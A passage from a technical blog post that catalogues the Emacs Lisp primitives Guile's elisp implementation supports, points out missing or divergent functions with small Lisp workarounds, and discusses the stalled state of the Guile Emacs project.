if when unless cond
;; short-circuiting
or and not
;; explicit nonlocal exit
throw catch
;; exceptions
signal condition-case unwind-protect
;; input
read-from-minibuffer
;; output
prin1-to-string print princ send-string-to-terminal terpri
;; cxr
car cdr caar cadr cdar cddr
car-safe cdr-safe
nthcdr
;; associations
assoc assq
;; search
member memql memq
;; destructive list processing
nreverse setcar setcdr rplaca rplacd
;; other list processing
cons list make-list `
mapcar mapc
append concat
reverse
length
;; symbols
defconst defvar defun defmacro
get put
fset set setq setplist
symbol-function symbol-name symbol-plist symbol-value
intern make-symbol
fmakunbound makunbound
quote function
;; plist
plist-get plist-put
lax-plist-get lax-plist-put
plist-member
;; strings
string string-match substring
upcase downcase
;; predicates
zerop floatp stringp numberp integerp wholenump
boundp fboundp functionp symbolp
consp listp nlistp
atom null
;; math
1+ 1-
fceiling ffloor ftruncate fround float
abs
min max
;; comparators
> < >= <= /= =
eq eql equal
string-equal string=
;; numerical operators
+ - * %
;; misc
random

Some notable omissions and differences:

  • No division. Most likely incompatible with Scheme’s numeric tower.
  • Input is read with read-from-minibuffer, not read-string.
  • send-string-to-terminal is unusual to have, but most likely the primitive output function.
  • string-match is nice to have, but of limited use without match-string.
  • prin1-to-string exists, prin1 doesn’t.
  • print doesn’t add newlines and behaves like prin1 should.

To do anything outside of textbook exercises you’d need to define extra primitives. Guile’s module/language/elisp/boot.el shows how to apply a band-aid on some of the previous shortcomings:

(fset '/ (@ (guile) /))
(fset 'read-string 'read-from-minibuffer)
(fset 'prin1 (@ (guile) write))
(defun print (object) (prin1 object) (terpri))

You could write more of it to reach that goal of using Emacs Lisp as a scripting language outside of Emacs, but you’d need to write Scheme to get there. Why not just use Scheme? Why invent a new runtime? The effort would be comparable to what node.js did for Chrome’s JavaScript engine, except with a far weaker sales pitch.

What does this mean for Guile Emacs?

What I’ve shown above is barely sufficient to bootstrap an Emacs on top of it. Guile Emacs requires customized versions of Guile and Emacs, then loads up the supporting Emacs Lisp files to do the rest. There are more incompatibilities, like called-interactively-p being stubbed out. Extending the presented rudimentary spec to contain actual tests would help with tracking progress and usability. It might even improve the overall quality of GNU Emacs itself, provided that the core developers are on board and believe in the idea. I’ve briefly searched emacs-devel for previous discussion on the topic, but only found bikeshedding about Guile Emacs itself, so if you feel strongly about the subject, feel free to start a discussion there!

With regards to Guile Emacs itself, the situation is trickier. The above repositories have not been touched for five years, with Robin Templeton being the sole contributor for five Google Summer of Code events. Even though the work is far from complete, it is impressive what a college student managed to do under supervision of Guile’s maintainer Andy Wingo and Ludovic Courtès. Further advancements require similarly motivated individuals to participate in the Guile community and become part of the effort, much like with other free software projects. It’s tempting to take a shortcut like donating to other developers, but unless they’ve figured out a way of converting that money into equivalent work, there will be little connection between what you give away and what they do in return. This again is a topic worth discussing, preferably with the people that can make a change.

[1]laurus did some research as well, you can find an interesting discussion on the #guile channel: http://logs.guix.gnu.org/guile/2020-05-16.log
[2]At least you could now solve SICP in Emacs Lisp with fewer footguns: you have bignums, lexical scoping by default and TCO!
[3]This isn’t exactly correct, what’s tested for is whether the symbol has its function/value slot bound which may contain other things, for example macros and keywords.
[4]Consider that people like to advocate for Guile Emacs with the argument that it will make for a faster Emacs. While this may hold true in the long term, it’s nowhere near close to that yet. Here’s hoping that Guile 3 will alleviate some of the pain…